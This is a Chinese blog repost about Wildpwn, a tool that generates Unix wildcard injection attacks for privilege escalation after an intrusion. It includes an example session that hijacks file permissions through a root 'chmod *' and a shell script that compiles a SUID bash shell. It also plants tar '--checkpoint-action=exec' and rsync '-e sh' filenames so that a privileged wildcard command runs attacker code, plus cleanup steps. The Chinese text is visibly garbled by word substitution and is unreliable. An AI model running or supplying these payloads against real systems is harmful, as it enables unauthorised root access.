Wildpwn:Unix通配符攻击工具

应用示例:

$ ls -lh /tmp/very_secret_file

-rw-r–r– 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/

drwxrwxrwx 2 root root 4,0K jun 28 21:38 .

[…]

-rw-rw-r– 1 root root1024 jun 28 21:38 secret_file_1

-rw-rw-r– 1 root root1024 jun 28 21:38 secret_file_2

[…]

$ python wildpwn.py –file /tmp/very_secret_file combined ./pwn_me/

[!] Selected payload: combined

[+] Done! Now wait for something like: chown uid:gid *(or)chmod [perms] * on ./pwn_me/. Good luck!

[…time passes / some cron gets executed…]

# chmod 000 * (for example)

[…back with the unprivileged user…]

$ ls -lha ./pwn_me/

[…]

-rwxrwxrwx 1 root root1024 jun 28 21:38 secret_file_1

-rwxrwxrwx 1 root root1024 jun 28 21:38 secret_file_2

[…]

$ ls -lha /tmp/very_secret_file

-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

用于tar/rsync进击的Bash脚本

#!/bin/sh

# get current user uid / gid

CURR_UID=”$(id -u)”

CURR_GID=”$(id -g)”

# save file

cat > .cachefile.c #include

int main()

{

setuid($CURR_UID);

setgid($CURR_GID);

execl(“/bin/bash”, “-bash”, NULL);

return 0;

}

EOF

# make folder where the payload will be saved

mkdir .cache

chmod 755 .cache

# compile & give SUID

gcc -w .cachefile.c -o .cache/.cachefile

chmod 4755 .cache/.cachefile

Clean up (tar)

# clean up

rm -rf ./’–checkpoint=1′

rm -rf ./’–checkpoint-action=exec=sh .webscript’

rm -rf .webscript

rm -rf .cachefile.c

Clean up (rsync)

# clean up

rm -rf ./’-e sh .syncscript’

rm -rf .syncscript

rm -rf .cachefile.c

Wildpwn是一个Python编写的UNIX通配符进击对象UNIX通配符进击是一种较早之前的黑客技巧,但时至今日仍有其用武之地在一些后渗透场景中,我们可以使用通配符来挟制文件所有者,履行随意率性敕令,提升权限等

在先容对象之前,建议大年夜家先涉猎下这篇先容UNIX通配符的文档:https://www.exploit-db.com/papers/33930/

基础应用

usage: wildpwn.py [-h] [–file FILE] payload folder

Tool to generate unix wildcard attacks

positional arguments:

payload要应用的payload: (combined | tar | rsync)

folder要写入payloads的位置

optional arguments:

-h, –help显示赞助信息并退出

–file FILE获取所有/变动权限的文件路径该参数只支持combined进击

Payload 类型

combined: 应用chown & chmod 文件相关技术,详细请参阅文档的4.1 和 4.2部分

tar: 应用Tar随意率性敕令履行技术,详细请参阅文档的4.3部分

rsync: 应用Rsync随意率性敕令履行技术,详细请参阅文档的4.4部分

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包